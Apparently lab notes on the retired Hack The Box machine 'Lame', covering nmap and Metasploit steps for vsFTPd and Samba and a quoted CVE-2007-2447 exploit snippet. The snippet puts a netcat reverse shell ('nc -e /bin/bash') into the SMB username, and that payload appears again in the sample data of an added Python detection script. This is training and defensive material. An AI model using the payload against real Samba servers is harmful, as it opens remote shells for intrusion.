Lame

CVE-2007-2447

Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

  • nmap top 1000 ports - nmap -A -Pn -sS -oN lame 10.10.10.3
  • search (searchsploit vsFTPd 2.3.4) and try to exploit the FTP server with msfconsole -> use exploit/unix/ftp/vsftpd_234_backdoor
  • do the same for Samba smbd 3.0.20
  • to dig further, HTB suggests exploring the 0xdf write-up

[!tip] Don't forget:

  • set LHOST
  • make it pretty - python -c 'import pty; pty.spawn("bash")'

From GitHub - MikeRega7/CVE-2007-2447-RCE: Samba 3.0.20:

 payload = "`nohup nc -e /bin/bash {} {} &`".format(lhost, lport)
 username = "/=" + payload
 conn = SMBConnection(username, "", "", "")
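
The snippet works because Samba 3.0.20, when `username map script` is set in smb.conf, hands the client-supplied username to a shell. A defender-side check for both halves of that condition, as an added example (not code from the MikeRega7 repository or these notes); the function names, the sample smb.conf and the logon list are constructed, and the logon list is assumed to come from whatever sensor records SMB session-setup usernames:

```python
import re

# Characters that let a string break out into a shell command. A trailing "$"
# (machine accounts such as "WS01$") and "\" (DOMAIN\user) are legitimate.
SHELL_META = re.compile(r"[`;|&<>\n]|\$[({]")

def injected_username(username):
    """True if an SMB session-setup username carries shell metacharacters."""
    return bool(SHELL_META.search(username))

def username_map_script(smb_conf):
    """Return the 'username map script' value from smb.conf text, or None."""
    # Samba ignores case and whitespace in parameter names; '#' and ';' start comments.
    value = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;" or "=" not in line:
            continue
        name, val = line.split("=", 1)
        if "".join(name.split()).lower() == "usernamemapscript":
            value = val.strip()
    return value or None

def triage(smb_conf, session_usernames):
    """Combine both checks: which logons need review, and is the sink enabled?"""
    hits = [(src, user) for src, user in session_usernames if injected_username(user)]
    return {"map_script": username_map_script(smb_conf), "suspicious_logons": hits}

# Constructed sample data (hypothetical, not taken from the Lame host).
SAMPLE_CONF = """
[global]
   workgroup = WORKGROUP
   ; username map = /etc/samba/smbusers
   Username Map Script = /etc/samba/scripts/mapusers.sh
"""
SAMPLE_LOGONS = [
    ("192.0.2.10", "WORKGROUP\\alice"),
    ("192.0.2.11", "WS01$"),
    ("192.0.2.66", "/=`nohup nc -e /bin/bash 192.0.2.66 4444 &`"),
]

if __name__ == "__main__":
    report = triage(SAMPLE_CONF, SAMPLE_LOGONS)
    print("username map script:", report["map_script"])
    for src, user in report["suspicious_logons"]:
        print("review logon from", src, "username", repr(user))
```

If `username_map_script` returns a value on a Samba version affected by CVE-2007-2447, removing that option or upgrading closes the path; the username check is only a detection aid.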